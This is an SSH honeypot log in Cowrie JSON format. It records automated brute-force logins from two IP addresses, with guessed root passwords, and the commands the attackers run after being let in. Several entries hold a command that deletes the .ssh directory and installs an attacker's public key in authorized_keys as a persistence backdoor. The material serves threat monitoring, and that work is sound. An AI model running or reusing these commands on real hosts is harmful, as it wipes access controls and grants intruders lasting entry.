{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:32.110885Z","src_ip":"212.227.235.229","session":"58cb82c81b90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43362,"dst_ip":"1.2.3.4","dst_port":22,"session":"79b83d5981af","protocol":"ssh","message":"New connection: 212.227.235.229:43362 (1.2.3.4:22) [session: 79b83d5981af]","sensor":"my-vps","timestamp":"2025-08-26T04:32:34.663273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:34.664087Z","src_ip":"212.227.235.229","session":"79b83d5981af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:34.735615Z","src_ip":"212.227.235.229","session":"79b83d5981af"}
{"eventid":"cowrie.login.failed","username":"Oracle","password":"Oracle123","message":"login attempt [Oracle/Oracle123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:32:35.064648Z","src_ip":"212.227.235.229","session":"79b83d5981af"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:36.137562Z","src_ip":"212.227.235.229","session":"79b83d5981af"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":40070,"dst_ip":"1.2.3.4","dst_port":22,"session":"230f82ef2cce","protocol":"ssh","message":"New connection: 68.183.87.241:40070 (1.2.3.4:22) [session: 230f82ef2cce]","sensor":"my-vps","timestamp":"2025-08-26T04:32:45.201210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:45.202226Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:45.476824Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.login.success","username":"root","password":"Xu@123456","message":"login attempt [root/Xu@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:32:46.609954Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:32:47.175705Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:32:47.176555Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:32:47.177675Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:47.452014Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:32:48.127054Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:32:48.128021Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:32:48.404091Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:48.405337Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":40082,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8930e57e2c7","protocol":"ssh","message":"New connection: 68.183.87.241:40082 (1.2.3.4:22) [session: f8930e57e2c7]","sensor":"my-vps","timestamp":"2025-08-26T04:32:48.653248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:48.653912Z","src_ip":"68.183.87.241","session":"f8930e57e2c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:48.907066Z","src_ip":"68.183.87.241","session":"f8930e57e2c7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:32:49.960884Z","src_ip":"68.183.87.241","session":"f8930e57e2c7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:51.217202Z","src_ip":"68.183.87.241","session":"f8930e57e2c7"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":40090,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f12c7fcb507","protocol":"ssh","message":"New connection: 68.183.87.241:40090 (1.2.3.4:22) [session: 0f12c7fcb507]","sensor":"my-vps","timestamp":"2025-08-26T04:32:51.470607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:51.471330Z","src_ip":"68.183.87.241","session":"0f12c7fcb507"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:51.724728Z","src_ip":"68.183.87.241","session":"0f12c7fcb507"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:32:52.778593Z","src_ip":"68.183.87.241","session":"0f12c7fcb507"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:53.033542Z","src_ip":"68.183.87.241","session":"0f12c7fcb507"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:53.035202Z","src_ip":"68.183.87.241","session":"230f82ef2cce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41162,"dst_ip":"1.2.3.4","dst_port":22,"session":"440990ca4a02","protocol":"ssh","message":"New connection: 212.227.235.229:41162 (1.2.3.4:22) [session: 440990ca4a02]","sensor":"my-vps","timestamp":"2025-08-26T04:32:53.527543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:56.631085Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:56.631787Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.login.success","username":"root","password":"qazxswedc123","message":"login attempt [root/qazxswedc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:32:57.638269Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:32:58.207606Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:32:58.208464Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:32:58.209558Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:58.462291Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:33:02.990489Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:33:02.991231Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:33:03.244808Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:03.245867Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45974,"dst_ip":"1.2.3.4","dst_port":22,"session":"e400dbdb38c7","protocol":"ssh","message":"New connection: 212.227.235.229:45974 (1.2.3.4:22) [session: e400dbdb38c7]","sensor":"my-vps","timestamp":"2025-08-26T04:33:03.492245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:03.492898Z","src_ip":"212.227.235.229","session":"e400dbdb38c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:03.741249Z","src_ip":"212.227.235.229","session":"e400dbdb38c7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:33:04.775265Z","src_ip":"212.227.235.229","session":"e400dbdb38c7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:06.025911Z","src_ip":"212.227.235.229","session":"e400dbdb38c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45976,"dst_ip":"1.2.3.4","dst_port":22,"session":"8644fa0d76b6","protocol":"ssh","message":"New connection: 212.227.235.229:45976 (1.2.3.4:22) [session: 8644fa0d76b6]","sensor":"my-vps","timestamp":"2025-08-26T04:33:06.285258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:06.286210Z","src_ip":"212.227.235.229","session":"8644fa0d76b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:06.546248Z","src_ip":"212.227.235.229","session":"8644fa0d76b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54070,"dst_ip":"1.2.3.4","dst_port":22,"session":"c44db02c8984","protocol":"ssh","message":"New connection: 212.227.235.229:54070 (1.2.3.4:22) [session: c44db02c8984]","sensor":"my-vps","timestamp":"2025-08-26T04:33:07.054078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:07.054976Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
